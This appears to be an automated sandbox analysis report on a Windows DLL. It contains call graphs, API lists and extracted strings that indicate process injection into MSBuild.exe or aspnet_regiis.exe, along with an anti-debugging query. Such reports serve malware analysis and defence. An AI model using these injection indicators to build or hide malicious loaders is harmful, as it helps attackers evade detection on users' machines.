6d75c75a ___scrt_is_nonwritable_in_current_image 12271->12273 12272 6d75c783 dllmain_raw 12275 6d75c79d dllmain_crt_dispatch 12272->12275 12282 6d75c769 12272->12282 12273->12272 12274 6d75c77e 12273->12274 12273->12282 12276 6d751cc0 __DllMainCRTStartup@12 5 API calls 12274->12276 12275->12274 12275->12282 12277 6d75c7be 12276->12277 12278 6d75c7ef 12277->12278 12281 6d751cc0 __DllMainCRTStartup@12 5 API calls 12277->12281 12279 6d75c7f8 dllmain_crt_dispatch 12278->12279 12278->12282 12280 6d75c80b dllmain_raw 12279->12280 12279->12282 12280->12282 12283 6d75c7d6 12281->12283 12284 6d75c69e __DllMainCRTStartup@12 86 API calls 12283->12284 12285 6d75c7e4 dllmain_raw 12284->12285 12285->12278 12287 6d75ca7e 12286->12287 12289 6d75ca87 12287->12289 12290 6d75ca1b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12287->12290 12289->12266 12290->12289 12356 6d76190e 12371 6d76395d 12356->12371 12361 6d761936 12399 6d761967 12361->12399 12362 6d76192a 12363 6d762800 __freea 14 API calls 12362->12363 12365 6d761930 12363->12365 12367 6d762800 __freea 14 API calls 12368 6d76195a 12367->12368 12369 6d762800 __freea 14 API calls 12368->12369 12370 6d761960 12369->12370 12372 6d763966 12371->12372 12373 6d76191f 12371->12373 12421 6d762442 12372->12421 12377 6d763eb4 GetEnvironmentStringsW 12373->12377 12378 6d761924 12377->12378 12379 6d763ecc 12377->12379 12378->12361 12378->12362 12380 6d763e11 ___scrt_uninitialize_crt WideCharToMultiByte 12379->12380 12381 6d763ee9 12380->12381 12382 6d763ef3 FreeEnvironmentStringsW 12381->12382 12383 6d763efe 12381->12383 12382->12378 12384 6d7627b2 15 API calls 12383->12384 12385 6d763f05 12384->12385 12386 6d763f1e 12385->12386 12387 6d763f0d 12385->12387 12389 6d763e11 ___scrt_uninitialize_crt WideCharToMultiByte 12386->12389 12388 6d762800 __freea 14 API calls 12387->12388 12390 6d763f12 FreeEnvironmentStringsW 12388->12390 12391 6d763f2e 12389->12391 12392 6d763f4f 12390->12392 12393 6d763f35 12391->12393 12394 6d763f3d 12391->12394 12392->12378 12396 6d762800 __freea 14 API calls 12393->12396 12395 6d762800 __freea 14 API calls 12394->12395 12397 6d763f3b FreeEnvironmentStringsW 12395->12397 12396->12397 12397->12392 12400 6d76197c 12399->12400 12401 6d762936 __dosmaperr 14 API calls 12400->12401 12402 6d7619a3 12401->12402 12403 6d7619ab 12402->12403 12413 6d7619b5 12402->12413 12404 6d762800 __freea 14 API calls 12403->12404 12405 6d76193d 12404->12405 12405->12367 12406 6d761a12 12407 6d762800 __freea 14 API calls 12406->12407 12407->12405 12408 6d762936 __dosmaperr 14 API calls 12408->12413 12409 6d761a21 12777 6d761a49 12409->12777 12413->12406 12413->12408 12413->12409 12415 6d761a3c 12413->12415 12417 6d762800 __freea 14 API calls 12413->12417 12768 6d761e60 12413->12768 12414 6d762800 __freea 14 API calls 12416 6d761a2e 12414->12416 12783 6d760f95 IsProcessorFeaturePresent 12415->12783 12420 6d762800 __freea 14 API calls 12416->12420 12417->12413 12419 6d761a48 12420->12405 12422 6d76244d 12421->12422 12427 6d762453 12421->12427 12424 6d76423c __dosmaperr 6 API calls 12422->12424 12423 6d76427b __dosmaperr 6 API calls 12426 6d76246d 12423->12426 12424->12427 12425 6d762459 12428 6d76245e 12425->12428 12469 6d761eba 12425->12469 12426->12425 12429 6d762936 __dosmaperr 14 API calls 12426->12429 12427->12423 12427->12425 12446 6d763768 12428->12446 12431 6d76247d 12429->12431 12433 6d762485 12431->12433 12434 6d76249a 12431->12434 12435 6d76427b __dosmaperr 6 API calls 12433->12435 12436 6d76427b __dosmaperr 6 API calls 12434->12436 12438 6d762491 12435->12438 12437 6d7624a6 12436->12437 12439 6d7624aa 12437->12439 12440 6d7624b9 12437->12440 12443 6d762800 __freea 14 API calls 12438->12443 12441 6d76427b __dosmaperr 6 API calls 12439->12441 12442 6d762189 __dosmaperr 14 API calls 12440->12442 12441->12438 12444 6d7624c4 12442->12444 12443->12425 12445 6d762800 __freea 14 API calls 12444->12445 12445->12428 12564 6d7638bd 12446->12564 12453 6d7637c4 12455 6d762800 __freea 14 API calls 12453->12455 12454 6d7637d2 12589 6d7639b8 12454->12589 12457 6d7637ab 12455->12457 12457->12373 12459 6d76380a 12460 6d762923 __dosmaperr 14 API calls 12459->12460 12462 6d76380f 12460->12462 12461 6d763851 12468 6d76389a 12461->12468 12600 6d7633e1 12461->12600 12464 6d762800 __freea 14 API calls 12462->12464 12463 6d763825 12463->12461 12465 6d762800 __freea 14 API calls 12463->12465 12464->12457 12465->12461 12467 6d762800 __freea 14 API calls 12467->12457 12468->12467 12480 6d764758 12469->12480 12473 6d761ef3 12516 6d7615e5 12473->12516 12474 6d761ed4 IsProcessorFeaturePresent 12477 6d761ee0 12474->12477 12476 6d761eca 12476->12473 12476->12474 12510 6d760d6c 12477->12510 12519 6d764686 12480->12519 12483 6d76479d 12484 6d7647a9 ___scrt_is_nonwritable_in_current_image 12483->12484 12485 6d7624d8 __dosmaperr 14 API calls 12484->12485 12486 6d7647f9 12484->12486 12487 6d76480b __InternalCxxFrameHandler 12484->12487 12492 6d7647da __InternalCxxFrameHandler 12484->12492 12485->12492 12488 6d762923 __dosmaperr 14 API calls 12486->12488 12489 6d764841 __InternalCxxFrameHandler 12487->12489 12530 6d762753 EnterCriticalSection 12487->12530 12490 6d7647fe 12488->12490 12494 6d76487e 12489->12494 12495 6d76497b 12489->12495 12506 6d7648ac 12489->12506 12493 6d760f68 ___std_exception_copy 39 API calls 12490->12493 12492->12486 12492->12487 12509 6d7647e3 12492->12509 12493->12509 12494->12506 12531 6d762387 GetLastError 12494->12531 12498 6d764986 12495->12498 12562 6d76279b LeaveCriticalSection 12495->12562 12500 6d7615e5 __InternalCxxFrameHandler 21 API calls 12498->12500 12502 6d76498e 12500->12502 12503 6d762387 _unexpected 39 API calls 12507 6d764901 12503->12507 12505 6d762387 _unexpected 39 API calls 12505->12506 12558 6d764927 12506->12558 12508 6d762387 _unexpected 39 API calls 12507->12508 12507->12509 12508->12509 12509->12476 12511 6d760d88 __InternalCxxFrameHandler std::bad_exception::bad_exception 12510->12511 12512 6d760db4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12511->12512 12515 6d760e85 __InternalCxxFrameHandler 12512->12515 12513 6d75c4d0 CatchGuardHandler 5 API calls 12514 6d760ea3 12513->12514 12514->12473 12515->12513 12517 6d761422 __InternalCxxFrameHandler 21 API calls 12516->12517 12518 6d7615f6 12517->12518 12520 6d764692 ___scrt_is_nonwritable_in_current_image 12519->12520 12525 6d762753 EnterCriticalSection 12520->12525 12522 6d7646a0 12526 6d7646e2 12522->12526 12525->12522 12529 6d76279b LeaveCriticalSection 12526->12529 12528 6d761ebf 12528->12476 12528->12483 12529->12528 12530->12489 12532 6d7623a3 12531->12532 12533 6d76239d 12531->12533 12534 6d76427b __dosmaperr 6 API calls 12532->12534 12537 6d7623a7 SetLastError 12532->12537 12535 6d76423c __dosmaperr 6 API calls 12533->12535 12536 6d7623bf 12534->12536 12535->12532 12536->12537 12539 6d762936 __dosmaperr 14 API calls 12536->12539 12541 6d762437 12537->12541 12542 6d76243c 12537->12542 12540 6d7623d4 12539->12540 12543 6d7623dc 12540->12543 12544 6d7623ed 12540->12544 12541->12505 12545 6d761eba CallUnexpected 37 API calls 12542->12545 12546 6d76427b __dosmaperr 6 API calls 12543->12546 12547 6d76427b __dosmaperr 6 API calls 12544->12547 12548 6d762441 12545->12548 12549 6d7623ea 12546->12549 12550 6d7623f9 12547->12550 12553 6d762800 __freea 14 API calls 12549->12553 12551 6d762414 12550->12551 12552 6d7623fd 12550->12552 12554 6d762189 __dosmaperr 14 API calls 12551->12554 12555 6d76427b __dosmaperr 6 API calls 12552->12555 12553->12537 12556 6d76241f 12554->12556 12555->12549 12557 6d762800 __freea 14 API calls 12556->12557 12557->12537 12559 6d7648f3 12558->12559 12560 6d76492b 12558->12560 12559->12503 12559->12507 12559->12509 12563 6d76279b LeaveCriticalSection 12560->12563 12562->12498 12563->12559 12565 6d7638c9 ___scrt_is_nonwritable_in_current_image 12564->12565 12567 6d7638e3 12565->12567 12608 6d762753 EnterCriticalSection 12565->12608 12569 6d763792 12567->12569 12571 6d761eba CallUnexpected 39 API calls 12567->12571 12568 6d76391f 12609 6d76393c 12568->12609 12575 6d7634ef 12569->12575 12573 6d76395c 12571->12573 12572 6d7638f3 12572->12568 12574 6d762800 __freea 14 API calls 12572->12574 12574->12568 12613 6d762ff3 12575->12613 12578 6d763522 12580 6d763539 12578->12580 12581 6d763527 GetACP 12578->12581 12579 6d763510 GetOEMCP 12579->12580 12580->12457 12582 6d7627b2 12580->12582 12581->12580 12583 6d7627f0 12582->12583 12587 6d7627c0 __dosmaperr 12582->12587 12584 6d762923 __dosmaperr 14 API calls 12583->12584 12586 6d7627ee 12584->12586 12585 6d7627db HeapAlloc 12585->12586 12585->12587 12586->12453 12586->12454 12587->12583 12587->12585 12588 6d761085 __dosmaperr 2 API calls 12587->12588 12588->12587 12590 6d7634ef 41 API calls 12589->12590 12592 6d7639d8 12590->12592 12591 6d763add 12593 6d75c4d0 CatchGuardHandler 5 API calls 12591->12593 12592->12591 12594 6d763a15 IsValidCodePage 12592->12594 12598 6d763a30 std::bad_exception::bad_exception 12592->12598 12595 6d7637ff 12593->12595 12594->12591 12596 6d763a27 12594->12596 12595->12459 12595->12463 12597 6d763a50 GetCPInfo 12596->12597 12596->12598 12597->12591 12597->12598 12656 6d7635c3 12598->12656 12601 6d7633ed ___scrt_is_nonwritable_in_current_image 12600->12601 12742 6d762753 EnterCriticalSection 12601->12742 12603 6d7633f7 12743 6d76342e 12603->12743 12608->12572 12612 6d76279b LeaveCriticalSection 12609->12612 12611 6d763943 12611->12567 12612->12611 12614 6d763011 12613->12614 12615 6d76300a 12613->12615 12614->12615 12616 6d762387 _unexpected 39 API calls 12614->12616 12615->12578 12615->12579 12617 6d763032 12616->12617 12621 6d764ddd 12617->12621 12622 6d763048 12621->12622 12623 6d764df0 12621->12623 12625 6d764e3b 12622->12625 12623->12622 12629 6d7652bc 12623->12629 12626 6d764e63 12625->12626 12627 6d764e4e 12625->12627 12626->12615 12627->12626 12651 6d7639a5 12627->12651 12630 6d7652c8 ___scrt_is_nonwritable_in_current_image 12629->12630 12631 6d762387 _unexpected 39 API calls 12630->12631 12632 6d7652d1 12631->12632 12634 6d765317 12632->12634 12642 6d762753 EnterCriticalSection 12632->12642 12634->12622 12635 6d7652ef 12643 6d76533d 12635->12643 12640 6d761eba CallUnexpected 39 API calls 12641 6d76533c 12640->12641 12642->12635 12644 6d76534b __dosmaperr 12643->12644 12646 6d765300 12643->12646 12645 6d765070 __dosmaperr 14 API calls 12644->12645 12644->12646 12645->12646 12647 6d76531c 12646->12647 12650 6d76279b LeaveCriticalSection 12647->12650 12649 6d765313 12649->12634 12649->12640 12650->12649 12652 6d762387 _unexpected 39 API calls 12651->12652 12653 6d7639aa 12652->12653 12654 6d7638bd ___scrt_uninitialize_crt 39 API calls 12653->12654 12655 6d7639b5 12654->12655 12655->12626 12657 6d7635eb GetCPInfo 12656->12657 12658 6d7636b4 12656->12658 12657->12658 12663 6d763603 12657->12663 12659 6d75c4d0 CatchGuardHandler 5 API calls 12658->12659 12661 6d763766 12659->12661 12661->12591 12667 6d7655fd 12663->12667 12666 6d765fb3 43 API calls 12666->12658 12668 6d762ff3 39 API calls 12667->12668 12669 6d76561d 12668->12669 12687 6d763d57 12669->12687 12671 6d7656d9 12674 6d75c4d0 CatchGuardHandler 5 API calls 12671->12674 12672 6d7656d1 12690 6d7656fe 12672->12690 12673 6d76564a 12673->12671 12673->12672 12676 6d7627b2 15 API calls 12673->12676 12678 6d76566f __alloca_probe_16 std::bad_exception::bad_exception 12673->12678 12677 6d76366b 12674->12677 12676->12678 12682 6d765fb3 12677->12682 12678->12672 12679 6d763d57 ___scrt_uninitialize_crt MultiByteToWideChar 12678->12679 12680 6d7656b8 12679->12680 12680->12672 12681 6d7656bf GetStringTypeW 12680->12681 12681->12672 12683 6d762ff3 39 API calls 12682->12683 12684 6d765fc6 12683->12684 12696 6d765dc4 12684->12696 12694 6d763cbf 12687->12694 12691 6d76571b 12690->12691 12692 6d76570a 12690->12692 12691->12671 12692->12691 12693 6d762800 __freea 14 API calls 12692->12693 12693->12691 12695 6d763cd0 MultiByteToWideChar 12694->12695 12695->12673 12697 6d765ddf 12696->12697 12698 6d763d57 ___scrt_uninitialize_crt MultiByteToWideChar 12697->12698 12703 6d765e23 12698->12703 12699 6d765f9e 12700 6d75c4d0 CatchGuardHandler 5 API calls 12699->12700 12702 6d76368c 12700->12702 12701 6d765ef1 12705 6d7656fe __freea 14 API calls 12701->12705 12702->12666 12703->12699 12703->12701 12704 6d7627b2 15 API calls 12703->12704 12706 6d765e49 __alloca_probe_16 12703->12706 12704->12706 12705->12699 12706->12701 12707 6d763d57 ___scrt_uninitialize_crt MultiByteToWideChar 12706->12707 12708 6d765e92 12707->12708 12708->12701 12724 6d764308 12708->12724 12711 6d765f00 12713 6d765f89 12711->12713 12715 6d7627b2 15 API calls 12711->12715 12717 6d765f12 __alloca_probe_16 12711->12717 12712 6d765ec8 12712->12701 12714 6d764308 6 API calls 12712->12714 12716 6d7656fe __freea 14 API calls 12713->12716 12714->12701 12715->12717 12716->12701 12717->12713 12718 6d764308 6 API calls 12717->12718 12719 6d765f55 12718->12719 12719->12713 12730 6d763e11 12719->12730 12721 6d765f6f 12721->12713 12722 6d765f78 12721->12722 12723 6d7656fe __freea 14 API calls 12722->12723 12723->12701 12733 6d763fdb 12724->12733 12728 6d764359 LCMapStringW 12729 6d764319 12728->12729 12729->12701 12729->12711 12729->12712 12732 6d763e24 ___scrt_uninitialize_crt 12730->12732 12731 6d763e62 WideCharToMultiByte 12731->12721 12732->12731 12734 6d7640da __dosmaperr 5 API calls 12733->12734 12735 6d763ff1 12734->12735 12735->12729 12736 6d764365 12735->12736 12739 6d763ff5 12736->12739 12738 6d764370 12738->12728 12740 6d7640da __dosmaperr 5 API calls 12739->12740 12741 6d76400b 12740->12741 12741->12738 12742->12603 12753 6d763bbd 12743->12753 12745 6d763450 12746 6d763bbd 39 API calls 12745->12746 12747 6d76346f 12746->12747 12748 6d762800 __freea 14 API calls 12747->12748 12749 6d763404 12747->12749 12748->12749 12750 6d763422 12749->12750 12767 6d76279b LeaveCriticalSection 12750->12767 12752 6d763410 12752->12468 12754 6d763bce 12753->12754 12757 6d763bca __InternalCxxFrameHandler 12753->12757 12755 6d763bd5 12754->12755 12759 6d763be8 std::bad_exception::bad_exception 12754->12759 12756 6d762923 __dosmaperr 14 API calls 12755->12756 12758 6d763bda 12756->12758 12757->12745 12760 6d760f68 ___std_exception_copy 39 API calls 12758->12760 12759->12757 12761 6d763c16 12759->12761 12762 6d763c1f 12759->12762 12760->12757 12763 6d762923 __dosmaperr 14 API calls 12761->12763 12762->12757 12764 6d762923 __dosmaperr 14 API calls 12762->12764 12765 6d763c1b 12763->12765 12764->12765 12766 6d760f68 ___std_exception_copy 39 API calls 12765->12766 12766->12757 12767->12752 12769 6d761e6e 12768->12769 12770 6d761e7c 12768->12770 12769->12770 12775 6d761e94 12769->12775 12771 6d762923 __dosmaperr 14 API calls 12770->12771 12772 6d761e84 12771->12772 12773 6d760f68 ___std_exception_copy 39 API calls 12772->12773 12774 6d761e8e 12773->12774 12774->12413 12775->12774 12776 6d762923 __dosmaperr 14 API calls 12775->12776 12776->12772 12778 6d761a56 12777->12778 12782 6d761a27 12777->12782 12779 6d761a6d 12778->12779 12780 6d762800 __freea 14 API calls 12778->12780 12781 6d762800 __freea 14 API calls 12779->12781 12780->12778 12781->12782 12782->12414 12784 6d760fa1 12783->12784 12785 6d760d6c __InternalCxxFrameHandler 8 API calls 12784->12785 12786 6d760fb6 GetCurrentProcess TerminateProcess 12785->12786 12786->12419

                                                                                                                            Executed Functions

                                                                                                                            Function 6D749EF0 Relevance: 84.8, APIs: 22, Strings: 22, Instructions: 7849memoryinjectionprocessCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$AllocMemoryVirtual$Write$CloseCreateHandleWindow$ConsoleContextReadShowThreadWow64
                                                                                                                            • String ID: 44O$9{!O$@$Bey;$Bey;$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$Jh7$Jh7$QAAAAAAAAAAUmVhZFByb2Nlc3NNZW1vcnkAAAAAAAAAR2V0TGFzdEVycm9yAAAAAEszMkVudW1Qcm9jZXNzTW9kdWxlc0V4AEszMkdldE1vZHVsZUJhc2VOYW1lQQAAAEszMkdldE1vZHVsZUluZm9ybWF0aW9uAEdldFN5c3RlbUluZm8AAABWaXJ0dWFsUXVlcnlFeAAAQ3JlYXRlUHJvY2Vzc0EAAFNsZWVwAAAAR2V0TW9kdWxlRmlsZU5hbWVBA$\w$x$^wO?$kernel32.dll$ntdll.dll$n0s$n0s$B~$Eq$QA`$p,\$p,\
                                                                                                                            • API String ID: 320347283-3941945049
                                                                                                                            • Opcode ID: 7b463f2264291ba9a429967fe772fa6092636e75c100b6896e4ffa5070244375
                                                                                                                            • Instruction ID: 6d136c9e58ef4e43e75d146a6f06c3bf5bb9f32f085c0d14f174f97d299b20b3
                                                                                                                            • Opcode Fuzzy Hash: 7b463f2264291ba9a429967fe772fa6092636e75c100b6896e4ffa5070244375
                                                                                                                            • Instruction Fuzzy Hash: 61D30335A542118FCB16CE2CCA947E977F1BB47325F00C2AAD819DB394CA369E85CF52
                                                                                                                            Function 6D747B60 Relevance: 38.0, APIs: 18, Strings: 3, Instructions: 1244filememoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1240 6d747b60-6d747b7e 1241 6d747b88-6d747b99 1240->1241 1242 6d74879d-6d74881a 1241->1242 1243 6d747b9f-6d747baf 1241->1243 1244 6d74905c 1242->1244 1246 6d747bb5-6d747bc5 1243->1246 1247 6d7486a6-6d748729 CloseHandle 1243->1247 1244->1241 1249 6d748f7f-6d748f89 1246->1249 1250 6d747bcb-6d747bdb 1246->1250 1247->1244 1249->1244 1252 6d748646-6d748650 1250->1252 1253 6d747be1-6d747bf1 1250->1253 1252->1244 1255 6d747bf7-6d747c07 1253->1255 1256 6d748e6a-6d748e98 CloseHandle * 2 1253->1256 1258 6d748535-6d748551 1255->1258 1259 6d747c0d-6d747c1d 1255->1259 1256->1244 1258->1244 1261 6d747c23-6d747c33 1259->1261 1262 6d748f2e-6d748f7a CreateFileMappingA 1259->1262 1264 6d7483e5-6d7483ef 1261->1264 1265 6d747c39-6d747c49 1261->1265 1262->1244 1264->1244 1267 6d748f1f-6d748f29 1265->1267 1268 6d747c4f-6d747c5f 1265->1268 1267->1244 1270 6d748655-6d7486a1 1268->1270 1271 6d747c65-6d747c75 1268->1271 1270->1244 1273 6d748cfd-6d748d49 1271->1273 1274 6d747c7b-6d747c8b 1271->1274 1273->1244 1276 6d748ac4-6d748b6c VirtualProtect 1274->1276 1277 6d747c91-6d747ca1 1274->1277 1276->1244 1279 6d747ca7-6d747cb7 1277->1279 1280 6d748e3d-6d748e65 CloseHandle 1277->1280 1282 6d747cbd-6d747ccd 1279->1282 1283 6d74881f-6d748829 1279->1283 1280->1244 1285 6d747cd3-6d747ce3 1282->1285 1286 6d74872e-6d748738 1282->1286 1283->1244 1288 6d7489dc-6d748a71 1285->1288 1289 6d747ce9-6d747cf9 1285->1289 1286->1244 1288->1244 1291 6d748322-6d748366 1289->1291 1292 6d747cff-6d747d0f 1289->1292 1291->1244 1294 6d747d15-6d747d25 1292->1294 1295 6d7488fe-6d748923 1292->1295 1297 6d748dd3-6d748deb 1294->1297 1298 6d747d2b-6d747d3b 1294->1298 1295->1244 1297->1244 1300 6d748dc4-6d748dce 1298->1300 1301 6d747d41-6d747d51 1298->1301 1300->1244 1303 6d748265-6d7482a1 GetModuleFileNameA 1301->1303 1304 6d747d57-6d747d67 1301->1304 1303->1244 1306 6d7488c2-6d7488d9 1304->1306 1307 6d747d6d-6d747d7d 1304->1307 1306->1244 1309 6d748e20-6d748e38 1307->1309 1310 6d747d83-6d747d93 1307->1310 1309->1244 1312 6d748928-6d748961 1310->1312 1313 6d747d99-6d747da9 1310->1313 1312->1244 1315 6d748f8e-6d748faa CloseHandle 1313->1315 1316 6d747daf-6d747dbf 1313->1316 1315->1244 1318 6d747dc5-6d747dd5 1316->1318 1319 6d748bdb-6d748c27 1316->1319 1321 6d748313-6d74831d 1318->1321 1322 6d747ddb-6d747deb 1318->1322 1319->1244 1321->1244 1324 6d747df1-6d747e01 1322->1324 1325 6d74873d-6d748747 1322->1325 1327 6d747e07-6d747e17 1324->1327 1328 6d748b71-6d748bd6 call 6d75d3d0 1324->1328 1325->1244 1332 6d74821d-6d748260 K32GetModuleInformation 1327->1332 1333 6d747e1d-6d747e2d 1327->1333 1328->1244 1332->1244 1335 6d747e33-6d747e43 1333->1335 1336 6d74874c-6d748798 1333->1336 1338 6d748e9d-6d748ea7 1335->1338 1339 6d747e49-6d747e59 1335->1339 1336->1244 1338->1244 1341 6d748462-6d748521 CreateFileMappingA 1339->1341 1342 6d747e5f-6d747e6f 1339->1342 1341->1244 1344 6d747e75-6d747e85 1342->1344 1345 6d74882e-6d748899 MapViewOfFile 1342->1345 1347 6d74836b-6d7483e0 1344->1347 1348 6d747e8b-6d747e9b 1344->1348 1345->1244 1347->1244 1350 6d7482a6-6d74830e CreateFileA 1348->1350 1351 6d747ea1-6d747eb1 1348->1351 1350->1244 1353 6d747eb7-6d747ec7 1351->1353 1354 6d74889e-6d7488bd 1351->1354 1356 6d748fd3-6d74904d VirtualProtect 1353->1356 1357 6d747ecd-6d747edd 1353->1357 1354->1244 1356->1244 1359 6d748a76-6d748a80 1357->1359 1360 6d747ee3-6d747ef3 1357->1360 1359->1244 1362 6d748c2c-6d748ce9 VirtualProtect 1360->1362 1363 6d747ef9-6d747f09 1360->1363 1362->1244 1365 6d748df0-6d748e1b 1363->1365 1366 6d747f0f-6d747f1f 1363->1366 1365->1244 1368 6d747f25-6d747f35 1366->1368 1369 6d748966-6d7489d7 1366->1369 1371 6d7480bb-6d748107 1368->1371 1372 6d747f3b-6d747f4b 1368->1372 1369->1244 1371->1244 1374 6d748ec0-6d748f1a GetCurrentProcess call 6d75d270 GetModuleHandleA 1372->1374 1375 6d747f51-6d747f61 1372->1375 1374->1244 1379 6d747f67-6d747f77 1375->1379 1380 6d748cee-6d748cf8 1375->1380 1382 6d7481ed-6d748209 1379->1382 1383 6d747f7d-6d747f8d 1379->1383 1380->1244 1382->1244 1385 6d747f93-6d747fa3 1383->1385 1386 6d748eac-6d748ebf call 6d75c4d0 1383->1386 1390 6d7481de-6d7481e8 1385->1390 1391 6d747fa9-6d747fb9 1385->1391 1390->1244 1393 6d74820e-6d748218 1391->1393 1394 6d747fbf-6d747fcf 1391->1394 1393->1244 1396 6d747fd5-6d747fe5 1394->1396 1397 6d748fbe-6d748fce 1394->1397 1399 6d7483f4-6d74845d 1396->1399 1400 6d747feb-6d747ffb 1396->1400 1397->1244 1399->1244 1402 6d748526-6d748530 1400->1402 1403 6d748001-6d748011 1400->1403 1402->1244 1405 6d748017-6d748027 1403->1405 1406 6d74810c-6d7481d9 GetCurrentProcess call 6d75d270 GetModuleHandleA 1403->1406 1409 6d74802d-6d74803d 1405->1409 1410 6d748faf-6d748fb9 1405->1410 1406->1244 1413 6d748556-6d7485c7 1409->1413 1414 6d748043-6d748053 1409->1414 1410->1244 1413->1244 1416 6d748d4e-6d748dbf 1414->1416 1417 6d748059-6d748069 1414->1417 1416->1244 1419 6d749052 1417->1419 1420 6d74806f-6d74807f 1417->1420 1419->1244 1422 6d748085-6d748095 1420->1422 1423 6d7485cc-6d748641 1420->1423 1425 6d7488de-6d7488f9 1422->1425 1426 6d74809b-6d7480ab 1422->1426 1423->1244 1425->1244 1428 6d748a85-6d748abf call 6d760bd0 1426->1428 1429 6d7480b1-6d7480b6 1426->1429 1428->1244 1429->1244
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModule$Handle$CreateCurrentProcessProtectVirtual$CloseInformationMappingNameView
                                                                                                                            • String ID: @$H~$U
                                                                                                                            • API String ID: 16584625-714931626
                                                                                                                            • Opcode ID: a6a30edecc12db43422a1bd32e3f2d29467f2a49af797770c8948a9c84ecbf28
                                                                                                                            • Instruction ID: dba7d92219317d09c92bd4f5459169c3d7cfd0c698096f4b3ac078257f4c7cb9
                                                                                                                            • Opcode Fuzzy Hash: a6a30edecc12db43422a1bd32e3f2d29467f2a49af797770c8948a9c84ecbf28
                                                                                                                            • Instruction Fuzzy Hash: D2B2D075A542268FDF16CE3CCA943DAB7F1BB46320F01C2AAD45897354D7358A898F83
                                                                                                                            Function 6D7499B0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 210COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1509 6d7499b0-6d7499ee GetModuleHandleW call 6d749070 1512 6d7499f5-6d749a00 1509->1512 1513 6d749a06-6d749a13 1512->1513 1514 6d749b89-6d749b90 1512->1514 1517 6d749ae1-6d749b18 call 6d75d270 1513->1517 1518 6d749a19-6d749a26 1513->1518 1515 6d749ccd 1514->1515 1515->1512 1517->1515 1522 6d749cc6 1518->1522 1523 6d749a2c-6d749a39 1518->1523 1522->1515 1525 6d749a3f-6d749a4c 1523->1525 1526 6d749c39-6d749ca7 1523->1526 1528 6d749b77-6d749b84 1525->1528 1529 6d749a52-6d749a5f 1525->1529 1526->1515 1528->1515 1531 6d749a65-6d749a72 1529->1531 1532 6d749b1d-6d749b60 NtQueryInformationProcess 1529->1532 1534 6d749b65-6d749b72 1531->1534 1535 6d749a78-6d749a85 1531->1535 1532->1515 1534->1515 1537 6d749cac-6d749cc5 call 6d75c4d0 1535->1537 1538 6d749a8b-6d749a98 1535->1538 1541 6d749bc6-6d749c34 1538->1541 1542 6d749a9e-6d749aab 1538->1542 1541->1515 1545 6d749b95-6d749ba3 1542->1545 1546 6d749ab1-6d749abe 1542->1546 1545->1515 1548 6d749bb4-6d749bc1 1546->1548 1549 6d749ac4-6d749ad1 1546->1549 1548->1515 1551 6d749ad7-6d749adc 1549->1551 1552 6d749ba8-6d749baf 1549->1552 1551->1515 1552->1515
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
